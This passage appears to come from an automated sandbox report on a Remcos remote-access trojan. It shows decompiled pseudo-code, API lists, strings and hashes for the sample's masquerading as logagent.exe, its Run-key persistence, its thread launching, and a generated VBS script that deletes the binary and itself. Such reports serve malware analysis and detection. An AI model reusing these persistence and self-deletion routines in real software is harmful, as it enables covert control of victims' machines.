						}
						L00401FAD(0x46c548, L00401E49(_t461, _t447, __eflags, 0xe));
						_t93 = L00401F95(0x46c548);
						_t462 = 0;
						_t272 = 1;
						CreateMutexA(0, 1, _t93); // executed
						_t95 = GetLastError();
						__eflags = _t95 - 0xb7;
						if(_t95 == 0xb7) {
							L45:
							E00401FC7();
							_t97 = _t272;
							goto L5;
						} else {
							E0040CD09();
							GetModuleFileNameW(0, "C:\Windows\SysWOW64\logagent.exe", 0x104);
							_t100 = E00417614(0x46c548);
							_push(0x46c548);
							_t448 = 0x80000002;
							 *0x46beb4 = _t100;
							_t101 = E004108E2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
							_t499 = _t497 + 0xc;
							E00401FD1(0x46c5b4, 0x80000002, 0x46c5b4, _t101);
							E00401FC7();
							__eflags =  *0x46beb4;
							if( *0x46beb4 == 0) {
								_push(" (32 bit)");
							} else {
								_push(" (64 bit)");
							}
							E00405A02(_t272, 0x46c5b4, _t462);
							_t105 =  *0x46bd20;
							__eflags = _t105;
							if(_t105 != 0) {
								 *0x46a9d0 =  *_t105();
							}
							_t477 = 0x46c578;
							__eflags = _v776 - _t462;
							if(__eflags == 0) {
								_t433 = L00401E49(0x46c578, _t448, __eflags, 0x2e);
								__eflags =  *((char*)(L00401F95(_t433)));
								if(__eflags != 0) {
									__eflags =  *0x46bd20 - _t462; // 0x7632e630
									if(__eflags != 0) {
										__eflags =  *0x46a9d0 - _t462; // 0x1
										if(__eflags == 0) {
											_t448 = L00401F95(0x46c518);
											_t254 = E0041083B(0x46c518, _t253, "origmsc");
											_pop(_t435);
											__eflags = _t254;
											if(__eflags == 0) {
												L00405F77(_t272, _t435, _t448);
											}
										} else {
											_push(_t433);
											_push(_t433);
											__eflags = E0040A713() - 0xffffffff;
											if(__eflags == 0) {
												E00406071(__eflags);
											}
										}
									}
								}
							}
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 0x27))));
							if(__eflags != 0) {
								E0040D3F7();
							}
							L00409DC9(_t272, 0x46c4e8, L00401F95(L00401E49(_t477, _t448, __eflags, 0xb)));
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 4))));
							 *0x46bb02 = __eflags != 0;
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 5))));
							 *0x46bafb = __eflags != 0;
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 8))));
							 *0x46bb00 = __eflags != 0;
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 3))));
							if(__eflags != 0) {
								_t240 = L00401F95(L00401E49(_t477, _t448, __eflags, 0x30));
								_t25 = _t240 + 2; // 0x2
								_t448 = _t25;
								do {
									_t423 =  *_t240;
									_t240 = _t240 + 2;
									__eflags = _t423 - _t462;
								} while (_t423 != _t462);
								__eflags = _t240 - _t448;
								if(__eflags != 0) {
									_t244 = L00401F95(L00401E49(_t477, _t448, __eflags, 9));
									_t246 = L00401F95(L00401E49(0x46c578, _t448, __eflags, 0x30));
									_t448 =  *_t244;
									L00401EFA(0x46c530,  *_t244, _t244, E0041805B( &_v780,  *_t244, _t246));
									L00401EF0();
									_t477 = 0x46c578;
								}
							}
							__eflags = _v776 - _t462;
							if(_v776 != _t462) {
								L00431F00(_t462,  &_v524, _t462, 0x208);
								_t121 = E00402489();
								_t122 = L00401F95(0x46c560);
								_t449 = L00401F95(0x46c518);
								E00410A30(_t124, "exepath",  &_v524, 0x208, _t122, _t121);
								_t501 = _t499 + 0x20;
								L00409DC9(_t272, 0x46c500,  &_v524);
								_t465 = 0x46c578;
								goto L47;
							} else {
								__eflags =  *0x46bb01;
								if(__eflags == 0) {
									L00409DC9(_t272, 0x46c500, "C:\Windows\SysWOW64\logagent.exe");
								} else {
									_t229 = L00401F95(L00401E49(_t477, _t448, __eflags, 0x1e));
									_t231 = L00401F95(L00401E49(_t477, _t448, __eflags, 0xc));
									_t233 = L00401F95(L00401E49(0x46c578, _t448, __eflags, 9));
									__eflags =  *_t229;
									__eflags =  *_t231;
									_t477 = 0x46c578;
									_t235 = L00401F95(L00401E49(0x46c578, _t448,  *_t231, 0xa));
									E0040A987( *_t233, L00401F95(L00401E49(0x46c578, _t448, __eflags, 0x30)), _t235, ((_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0x000000ff);
									_t499 = _t499 + 0xc;
									_t272 = 1;
									_t462 = 0;
								}
								_t210 = E00402489();
								_t452 = 2;
								_t394 =  ~(0 | __eflags > 0x00000000) | (_t210 + 0x00000001) * _t452;
								_push(_t394);
								_v780 = _t394;
								_t486 = E0042F4C6(_t394, (_t210 + 1) * _t452 >> 0x20, _t477, __eflags);
								__eflags = _t486;
								if(_t486 == 0) {
									_t486 = _t462;
								} else {
									L00431F00(_t462, _t486, _t462, _v780);
									_t499 = _t499 + 0xc;
								}
								_t214 = L00401EEB(0x46c500);
								_t455 = _t486 - _t214;
								__eflags = _t455;
								_t467 = 2;
								do {
									_t397 =  *_t214 & 0x0000ffff;
									 *(_t214 + _t455) = _t397;
									_t214 = _t214 + _t467;
									__eflags = _t397;
								} while (_t397 != 0);
								_push(_t397);
								_t215 = E00402489();
								_t216 = L00401F95(0x46c560);
								_t217 = E00402489();
								E00410C80(L00401F95(0x46c518), __eflags, "exepath", _t486, 2 + _t217 * 2, _t216, _t215); // executed
								E0042F4CF(_t486);
								_t501 = _t499 + 0x1c;
								_t465 = 0x46c578;
								L00401E49(0x46c578, _t219, __eflags, 0xd);
								_t449 = "0";
								__eflags = E0040EAD9(__eflags);
								if(__eflags == 0) {
									L47:
									_push(_t272);
									_t129 = L00401F95(L00401E49(_t465, _t449, __eflags, 0x34));
									_t502 = _t501 - 0x18;
									E00402084(_t272, _t502, _t129);
									_push("licence");
									_t450 = L00401F95(0x46c518); // executed
									E00410AA7(0x46c518, _t131); // executed
									_t497 = _t502 + 0x20;
									_t135 = E00436769(_t133, L00401F95(L00401E49(_t465, _t131, __eflags, 0x28)));
									 *0x46bb03 = _t135;
									__eflags = _t135 - 2;
									if(_t135 != 2) {
										__eflags = _t135 - _t272;
										if(__eflags == 0) {
											_t388 = 0;
											__eflags = 0;
											goto L51;
										}
									} else {
										_t388 = _t272;
										L51:
										L00418F59(_t272, _t388, _t450);
										__eflags = 0;
										CreateThread(0, 0,  &M00418D28, 0, 0, 0);
									}
									_t137 = L00401F95(L00401E49(_t465, _t450, __eflags, 0x37));
									_t139 = L00401F95(L00401E49(_t465, _t450, __eflags, 0x10));
									_t141 = L00401F95(L00401E49(_t465, _t450, __eflags, 0xf));
									__eflags =  *_t137;
									_t471 = 0x46c578;
									_t144 = E00436769(_t142, L00401F95(L00401E49(0x46c578, _t450,  *_t137, 0x36)));
									_t146 = L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x11));
									E0040846D(_t139,  *_t141 & 0x000000ff,  *_t139 & 0x000000ff, L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x31)), _t146, _t144, (_t140 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x14)))) - 1;
									if(__eflags != 0) {
										_t461 = CreateThread;
									} else {
										_t199 = 2;
										_t485 = E0042F218(_t450, 0x46c578, __eflags, _t199);
										 *_t485 = 0;
										_t386 = L00401E49(0x46c578, _t450, __eflags, 0x35);
										_t203 = L00401F95(_t386);
										_t461 = CreateThread;
										__eflags =  *_t203;
										 *((char*)(_t485 + 1)) = _t386 & 0xffffff00 | __eflags != 0x00000000;
										CreateThread(0, 0, E00415938, _t485, 0, 0);
										_t471 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x16)))) - 1;
									if(__eflags == 0) {
										_t193 = 2;
										_t484 = E0042F218(_t450, _t471, __eflags, _t193);
										 *_t484 = 1;
										_t382 = L00401E49(0x46c578, _t450, __eflags, 0x35);
										_t196 = L00401F95(_t382);
										__eflags =  *_t196;
										__eflags = 0;
										 *((char*)(_t484 + 1)) = _t382 & 0xffffff00 |  *_t196 != 0x00000000;
										CreateThread(0, 0, E00415938, _t484, 0, 0);
										_t471 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x23)))) - 1;
									if(__eflags == 0) {
										 *0x46ba75 = 1;
										_t185 = L00401F95(L00401E49(_t471, _t450, __eflags, 0x25));
										_t187 = L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x26));
										_t450 =  *_t185;
										L00401EFA(0x46c0e0,  *_t185, _t185, E0041800F( &_v780,  *_t185, _t187));
										L00401EF0();
										__eflags = 0;
										CreateThread(0, 0, E00401BCD, 0, 0, 0);
										_t471 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x2b)))) - 1;
									if(__eflags == 0) {
										_t471 = L00401F95(L00401E49(_t471, _t450, __eflags, 0x2c));
										_t182 = E00436769(_t180, L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x2d)));
										__eflags =  *_t471;
										_t450 = _t182;
										__eflags =  *_t471 != 0;
										E0040A679(_t182);
									}
									_t160 = E00416D9E( &_v772, _t461, __eflags); // executed
									L00401EFA(0x46c584, _t450, _t471, _t160);
									_t360 =  &_v776;
									L00401EF0();
									_t163 =  *0x46bd14;
									_t269 = 0;
									__eflags = _t163;
									if(_t163 != 0) {
										 *_t163(0); // executed
									}
									CreateThread(_t269, _t269, E0040D0B5, _t269, _t269, _t269); // executed
									__eflags =  *0x46bd4e;
									if( *0x46bd4e != 0) {
										CreateThread(_t269, _t269, E0040FAC7, _t269, _t269, _t269);
									}
									__eflags =  *0x46bd4f;
									if( *0x46bd4f != 0) {
										CreateThread(_t269, _t269, 0x40ffe5, _t269, _t269, _t269);
									}
									_t165 =  *0x46a9d0; // 0x1
									_t166 = _t165 - _t269;
									__eflags = _t166;
									if(__eflags == 0) {
										goto L71;
									} else {
										__eflags = _t166 - 1;
										if(__eflags == 0) {
											_push("Administrator");
											goto L72;
										}
									}
									goto L73;
								} else {
									_t224 = L00401E49(0x46c578, "0", __eflags, 0xd);
									_t506 = _t501 - 0x18;
									_t449 = _t224;
									E004172DA(_t506, _t224);
									_t226 = L0040CE44(__eflags);
									_t501 = _t506 + 0x18;
									__eflags = _t226 - _t272;
									if(__eflags != 0) {
										goto L47;
									} else {
										_t272 = 3;
										goto L45;
									}
								}
							}
						}
					} else {
						_v780 = 0;
						_t265 = E00410885(L00401F95(0x46c518), "WD",  &_v780);
						__eflags = _t265;
						if(_t265 != 0) {
							L00410CE2(L00401F95(0x46c518), __eflags, "WD");
							L0040FD95();
							L71:
							_push("User");
							L72:
							E004075C2(_t269, _t497 - 0x18, "Access level: ", _t461, __eflags, E00402084(_t269,  &_v776));
							E00402084(_t269, _t497 - 4, "[Info]");
							L00416C80(_t269, _t461);
							_t360 =  &_v784;
							E00401FC7(); // executed
							L73:
							E00411929(); // executed
							asm("int3");
							_push(_t471);
							_t481 = _t360 + 0x68;
							E0040D515(_t481);
							_t284 = _t481;
							 *_t284 = 0x460788;
							 *_t284 = 0x460744;
							return E004304F6(_t284);
						} else {
							goto L8;
						}
					}
				} else {
					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
					if(__eflags != 0) {
						goto L6;
					} else {
						__eax =  *(__ecx + 2) & 0x000000ff;
						__eflags = __al;
						if(__eflags != 0) {
							goto L6;
						} else {
							_push(__ecx);
							_push(__ecx);
							__ecx =  &_v700;
							__eax = E0040D544( &_v700, __edx, __eflags, "license_code.txt", 2);
							__ecx = 0x46c578;
							__ecx = L00401E49(0x46c578, __edx, __eflags, 0x34);
							__edx = __eax;
							__ecx =  &_v720;
							__eax = E0040E8BB( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							__eax = E0040D4F5( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							L74();
							__ecx =  &_v744;
							E00401FC7() = 0;
							__eax = 1;
							__eflags = 1;
							L5:
							return _t97;
						}
					}
				}
			}

0x0040c2be
0x0040c2d4
0x0040c2d9
0x0040c2dc
0x0040c2e1
0x0040c2eb
0x0040c2f0
0x0040c2fa
0x0040c303
0x0040c308
0x0040c30c
0x0040c315
0x0040c31a
0x0040c320
0x0040c387
0x0040c387
0x0040c3a5
0x0040c3a8
0x0040c3ca
0x0040c3d0
0x0040c3d8
0x0040c3e1
0x0040c3ea
0x0040c3f9
0x0040c3fe
0x0040c405
0x0040c416
0x0040c418
0x0040c41f
0x0040c426
0x0040c42b
0x0040c42d
0x0040c434
0x0040c43a
0x0040c462
0x0040c46d
0x0040c471
0x0040c477
0x0040c479
0x0040c47b
0x0040c483
0x0040c48a
0x0040c48a
0x0040c4a7
0x0040c4a9
0x0040c4b0
0x0040c4b2
0x0040c4bc
0x0040c4be
0x0040c4c3
0x0040c4d5
0x0040c4dc
0x0040c4e4
0x0040c4e6
0x0040c4e9
0x0040c4ef
0x0040c4f5
0x0040c4fa
0x0040c87d
0x0040c881
0x0040c886
0x00000000
0x0040c500
0x0040c500
0x0040c510
0x0040c516
0x0040c51b
0x0040c526
0x0040c52b
0x0040c534
0x0040c539
0x0040c544
0x0040c54d
0x0040c552
0x0040c55b
0x0040c564
0x0040c55d
0x0040c55d
0x0040c55d
0x0040c569
0x0040c56e
0x0040c573
0x0040c575
0x0040c579
0x0040c579
0x0040c57e
0x0040c583
0x0040c587
0x0040c592
0x0040c599
0x0040c59c
0x0040c59e
0x0040c5a4
0x0040c5a6
0x0040c5ac
0x0040c5d0
0x0040c5d2
0x0040c5d7
0x0040c5d8
0x0040c5da
0x0040c5dc
0x0040c5dc
0x0040c5ae
0x0040c5ae
0x0040c5af
0x0040c5b5
0x0040c5b8
0x0040c5ba
0x0040c5ba
0x0040c5b8
0x0040c5ac
0x0040c5a4
0x0040c59c
0x0040c5f1
0x0040c5f4
0x0040c5f6
0x0040c5f6
0x0040c611
0x0040c62a
0x0040c62d
0x0040c644
0x0040c647
0x0040c65e
0x0040c661
0x0040c674
0x0040c677
0x0040c684
0x0040c689
0x0040c689
0x0040c68c
0x0040c68c
0x0040c68f
0x0040c692
0x0040c692
0x0040c697
0x0040c69b
0x0040c6a8
0x0040c6bd
0x0040c6c2
0x0040c6d5
0x0040c6de
0x0040c6e3
0x0040c6e3
0x0040c69b
0x0040c6e8
0x0040c6ec
0x0040c89c
0x0040c8ab
0x0040c8b3
0x0040c8d1
0x0040c8d3
0x0040c8d8
0x0040c8e8
0x0040c8ed
0x00000000
0x0040c6f2
0x0040c6f2
0x0040c6f9
0x0040c78f
0x0040c6ff
0x0040c70a
0x0040c71c
0x0040c731
0x0040c736
0x0040c73e
0x0040c744
0x0040c75c
0x0040c776
0x0040c77d
0x0040c780
0x0040c781
0x0040c781
0x0040c799
0x0040c7a3
0x0040c7ab
0x0040c7ad
0x0040c7ae
0x0040c7b7
0x0040c7ba
0x0040c7bc
0x0040c7ce
0x0040c7be
0x0040c7c4
0x0040c7c9
0x0040c7c9
0x0040c7d5
0x0040c7de
0x0040c7de
0x0040c7e0
0x0040c7e1
0x0040c7e1
0x0040c7e4
0x0040c7e8
0x0040c7ea
0x0040c7ea
0x0040c7ef
0x0040c7f7
0x0040c7ff
0x0040c80a
0x0040c829
0x0040c82f
0x0040c834
0x0040c837
0x0040c840
0x0040c845
0x0040c851
0x0040c853
0x0040c8f2
0x0040c8f2
0x0040c8fe
0x0040c903
0x0040c909
0x0040c90e
0x0040c91d
0x0040c91f
0x0040c924
0x0040c938
0x0040c943
0x0040c949
0x0040c94b
0x0040c951
0x0040c953
0x0040c955
0x0040c955
0x00000000
0x0040c955
0x0040c94d
0x0040c94d
0x0040c957
0x0040c957
0x0040c95c
0x0040c968
0x0040c968
0x0040c975
0x0040c987
0x0040c999
0x0040c99e
0x0040c9a3
0x0040c9c0
0x0040c9d2
0x0040c9f1
0x0040ca09
0x0040ca0b
0x0040ca54
0x0040ca0d
0x0040ca0f
0x0040ca16
0x0040ca22
0x0040ca29
0x0040ca2b
0x0040ca30
0x0040ca36
0x0040ca48
0x0040ca4b
0x0040ca4d
0x0040ca4d
0x0040ca6a
0x0040ca6c
0x0040ca70
0x0040ca77
0x0040ca81
0x0040ca88
0x0040ca8a
0x0040ca8f
0x0040ca95
0x0040caa1
0x0040caa4
0x0040caa6
0x0040caa6
0x0040cabb
0x0040cabd
0x0040cac3
0x0040cad0
0x0040cae5
0x0040caea
0x0040cafd
0x0040cb06
0x0040cb0b
0x0040cb17
0x0040cb19
0x0040cb19
0x0040cb2e
0x0040cb30
0x0040cb49
0x0040cb58
0x0040cb5d
0x0040cb60
0x0040cb63
0x0040cb66
0x0040cb66
0x0040cb6f
0x0040cb7a
0x0040cb7f
0x0040cb83
0x0040cb88
0x0040cb8d
0x0040cb8f
0x0040cb91
0x0040cb94
0x0040cb94
0x0040cba0
0x0040cba2
0x0040cba9
0x0040cbb5
0x0040cbb5
0x0040cbb7
0x0040cbbe
0x0040cbca
0x0040cbca
0x0040cbcc
0x0040cbd1
0x0040cbd1
0x0040cbd3
0x00000000
0x0040cbd5
0x0040cbd5
0x0040cbd8
0x0040cbda
0x00000000
0x0040cbda
0x0040cbd8
0x00000000
0x0040c859
0x0040c85d
0x0040c862
0x0040c865
0x0040c869
0x0040c86e
0x0040c873
0x0040c876
0x0040c878
0x00000000
0x0040c87a
0x0040c87c
0x00000000
0x0040c87c
0x0040c878
0x0040c853
0x0040c6ec
0x0040c43c
0x0040c440
0x0040c453
0x0040c45a
0x0040c45c
0x0040cbef
0x0040cbf9
0x0040cbfe
0x0040cbfe
0x0040cc03
0x0040cc17
0x0040cc26
0x0040cc2b
0x0040cc33
0x0040cc37
0x0040cc3c
0x0040cc3c
0x0040cc41
0x0040cc42
0x0040cc43
0x0040cc48
0x0040cc4d
0x0040e032
0x0040c177
0x0040c183
0x00000000
0x00000000
0x00000000
0x0040c45c
0x0040c322
0x0040c322
0x0040c326
0x00000000
0x0040c328
0x0040c328
0x0040c32c
0x0040c32e
0x00000000
0x0040c330
0x0040c330
0x0040c331
0x0040c339
0x0040c33d
0x0040c344
0x0040c34e
0x0040c355
0x0040c357
0x0040c35b
0x0040c360
0x0040c364
0x0040c369
0x0040c36d
0x0040c372
0x0040c37b
0x0040c37d
0x0040c37d
0x0040c37e
0x0040c384
0x0040c384
0x0040c32e
0x0040c326

APIs

OpenMutexA.KERNEL32 ref: 0040C471
WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C483
CloseHandle.KERNEL32(00000000), ref: 0040C48A
CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0040C4E9
GetLastError.KERNEL32 ref: 0040C4EF
GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\logagent.exe,00000104), ref: 0040C510

Part of subcall function 0040E8BB: __EH_prolog.LIBCMT ref: 0040E8C0

Strings

Administrator, xrefs: 0040CBDA
Sept-AITAB5, xrefs: 0040C4CD
origmsc, xrefs: 0040C5C1
Software\, xrefs: 0040C3B5
license_code.txt, xrefs: 0040C334
C:\Windows\SysWOW64\logagent.exe, xrefs: 0040C50A, 0040C785
Exe, xrefs: 0040C3F4
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0040C521
licence, xrefs: 0040C90E
Exe, xrefs: 0040C3EF
Remcos_Mutex_Inj, xrefs: 0040C462
Access level: , xrefs: 0040CC0F
(64 bit), xrefs: 0040C55D
(32 bit), xrefs: 0040C564
Remcos, xrefs: 0040C60C
exepath, xrefs: 0040C81D, 0040C8C7
ProductName, xrefs: 0040C51C
Inj, xrefs: 0040C494, 0040C49F, 0040C4B4
User, xrefs: 0040CBFE
[Info], xrefs: 0040CC21

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Windows\SysWOW64\logagent.exe$Exe$Exe$Inj$ProductName$Remcos$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Sept-AITAB5$Software\$User$[Info]$exepath$licence$license_code.txt$origmsc
API String ID: 1247502528-4187597192
Opcode ID: c4514ffebb5a2fcefdb17c9af0de6ab281086a106f02c27a89bcde85ccf605b6
Instruction ID: 97ecaa49e5e083256040f844ff0fd3ae96e39466cf8f0e182fdc5e320802d438
Opcode Fuzzy Hash: c4514ffebb5a2fcefdb17c9af0de6ab281086a106f02c27a89bcde85ccf605b6
Instruction Fuzzy Hash: 5432F460B443516BDA1577729CA6B3F26898B8170CF04053FB542BB2E3EE7C9D4583AE

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD84, Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 259
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040AD84() {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				short _v668;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				signed int _t58;
				void* _t82;
				void* _t84;
				void* _t85;
				void* _t87;
				signed char _t123;
				signed char _t124;
				void* _t227;
				void* _t229;
				void* _t230;
				void* _t231;

				E0041015B();
				if( *0x46a9d4 != 0x30) {
					L00409D73();
				}
				_t227 =  *0x46bd6b - 1; // 0x0
				if(_t227 == 0) {
					E0041537E(_t227);
				}
				if( *0x46ba75 != 0) {
					E00417754(L00401EEB(0x46c0e0));
				}
				_t214 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t229 =  *0x46bb02 - 1; // 0x1
				if(_t229 == 0) {
					E00410D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401EEB(0x46c4e8)); // executed
				}
				_t230 =  *0x46bafb - 1; // 0x0
				if(_t230 == 0) {
					E00410D5C(0x80000002, _t214, L00401EEB(0x46c4e8));
				}
				_t231 =  *0x46bb00 - 1; // 0x0
				if(_t231 == 0) {
					E00410D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401EEB(0x46c4e8));
				}
				L00431F00(0,  &_v668, 0, 0x208);
				_t49 = E00402489();
				_t50 = L00401F95(0x46c560);
				_t53 = E00410A30(L00401F95(0x46c518), "exepath",  &_v668, 0x208, _t50, _t49); // executed
				_t232 = _t53;
				if(_t53 == 0) {
					GetModuleFileNameW(0,  &_v668, 0x208);
				}
				RegDeleteKeyA(0x80000001, L00401F95(0x46c518)); // executed
				_t56 = E004074E4(_t232);
				_t233 = _t56;
				if(_t56 != 0) {
					SetFileAttributesW(L00401EEB(0x46c530), 0x80);
				}
				_t58 = SetFileAttributesW( &_v668, 0x80); // executed
				_t123 =  ~_t58;
				asm("sbb bl, bl");
				E004030A6(_t123,  &_v148, E004172DA( &_v76, E00417093( &_v28)), 0, _t233, L".vbs");
				L00401EF0();
				E00401FC7();
				E00404429(_t123,  &_v124, E004030A6(_t123,  &_v28, E0040427F(_t123,  &_v76, E0043987F(_t123,  &_v28, _t233, L"Temp")), 0, _t233, "\\"), _t233,  &_v148);
				L00401EF0();
				L00401EF0();
				E00404405(_t123,  &_v52, L"On Error Resume Next\n", _t233, E0040427F(_t123,  &_v28, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				L00401EF0();
				_t124 = _t123 & 0x00000001;
				_t234 = _t124;
				if(_t124 != 0) {
					E00403311(E004030A6(_t124,  &_v28, E00404405(_t124,  &_v76, L"while fso.FileExists(\"", _t234, E0040427F(_t124,  &_v100,  &_v668)), 0, _t234, L"\")\n"));
					L00401EF0();
					L00401EF0();
					L00401EF0();
				}
				E00403311(E004030A6(_t124,  &_v100, E004030A6(_t124,  &_v28, E0040427F(_t124,  &_v76, L"fso.DeleteFile \""), 0, _t234,  &_v668), 0, _t234, L"\"\n"));
				L00401EF0();
				L00401EF0();
				L00401EF0();
				_t235 = _t124;
				if(_t124 != 0) {
					E0040766C(_t124,  &_v52, 0, L"wend\n");
				}
				_t82 = E004074E4(_t235);
				_t236 = _t82;
				if(_t82 != 0) {
					E00403311(E004030A6(0x45f724,  &_v100, L00409E69( &_v28, L"fso.DeleteFolder \"", _t236, 0x46c530), 0, _t236, L"\"\n"));
					L00401EF0();
					L00401EF0();
				}
				E0040766C(0x45f724,  &_v52, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t84 = L00401EEB( &_v124);
				_t85 = E00402489();
				_t87 = E00417947(L00401EEB( &_v52), _t85 + _t85, _t84, 0); // executed
				if(_t87 != 0) {
					ShellExecuteW(0, L"open", L00401EEB( &_v124), 0x45f724, 0x45f724, 0); // executed
				}
				ExitProcess(0);
			}

0x0040ad90
0x0040ad9c
0x0040ad9e
0x0040ad9e
0x0040ada6
0x0040adac
0x0040adae
0x0040adae
0x0040adba
0x0040adc8
0x0040adc8
0x0040add2
0x0040add7
0x0040addd
0x0040adee
0x0040adf3
0x0040adf4
0x0040adfa
0x0040ae0b
0x0040ae10
0x0040ae11
0x0040ae17
0x0040ae2b
0x0040ae30
0x0040ae41
0x0040ae50
0x0040ae58
0x0040ae79
0x0040ae81
0x0040ae83
0x0040ae8e
0x0040ae8e
0x0040aea1
0x0040aeb3
0x0040aebe
0x0040aec0
0x0040aecf
0x0040aecf
0x0040aedd
0x0040aee4
0x0040aeeb
0x0040af04
0x0040af0d
0x0040af15
0x0040af4a
0x0040af53
0x0040af5b
0x0040af76
0x0040af7f
0x0040af84
0x0040af84
0x0040af87
0x0040afbb
0x0040afc3
0x0040afcb
0x0040afd3
0x0040afd3
0x0040b00b
0x0040b013
0x0040b01b
0x0040b023
0x0040b028
0x0040b02a
0x0040b034
0x0040b034
0x0040b047
0x0040b04c
0x0040b04e
0x0040b073
0x0040b07b
0x0040b083
0x0040b083
0x0040b090
0x0040b099
0x0040b0a2
0x0040b0b7
0x0040b0c0
0x0040b0d4
0x0040b0d4
0x0040b0db

APIs

Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,0046C518,0046C500), ref: 0040AE8E
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040AEA1
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,?,0046C518,0046C500), ref: 0040AECF
SetFileAttributesW.KERNELBASE(?,00000080,?,?,?,?,?,?,0046C518,0046C500), ref: 0040AEDD

Part of subcall function 00409D73: TerminateThread.KERNEL32(0040884B,00000000,0046C500,0040ADA3,?,0046C518,0046C500), ref: 00409D82
Part of subcall function 00409D73: UnhookWindowsHookEx.USER32(00000000), ref: 00409D92
Part of subcall function 00409D73: TerminateThread.KERNEL32(00408830,00000000,?,0046C518,0046C500), ref: 00409DA4

ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B0D4
ExitProcess.KERNEL32 ref: 0040B0DB

Strings

.vbs, xrefs: 0040AEE6
fso.DeleteFolder ", xrefs: 0040B056
fso.DeleteFile ", xrefs: 0040AFE4
open, xrefs: 0040B0CE
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040ADD2
On Error Resume Next, xrefs: 0040AF6E
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040AF60
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040B088
Remcos, xrefs: 0040ADCD
exepath, xrefs: 0040AE6B
while fso.FileExists(", xrefs: 0040AF9E
Temp, xrefs: 0040AF26
"), xrefs: 0040AF89
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040AE21
wend, xrefs: 0040B02C

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: FileTerminate$AttributesProcessThread$DeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 3659626935-3677834288
Opcode ID: 399a06449dd7154ae290ab5bd263b0b4e4de6b1dd1c2668b975ab94b3101c976
Instruction ID: 1589e96350d2b26083133e670dfbb90ce18de44782133b39b347ac2ed663d9b9
Opcode Fuzzy Hash: 399a06449dd7154ae290ab5bd263b0b4e4de6b1dd1c2668b975ab94b3101c976
Instruction Fuzzy Hash: D1816D71A102145ACB15FBA1DCA69EF776A9F50704F10003FB806771E2EE7C5E8A869D

Uniqueness

Uniqueness Score: -1.00%

Function 00411929, Relevance: 30.5, APIs: 6, Strings: 11, Instructions: 743
sleepnetworkthreadCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00411929() {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v20;
				char _v32;
				char _v56;
				char _v80;
				char _v104;
				char _v128;
				char _v140;
				void* _v163;
				char _v164;
				char _v188;
				char _v212;
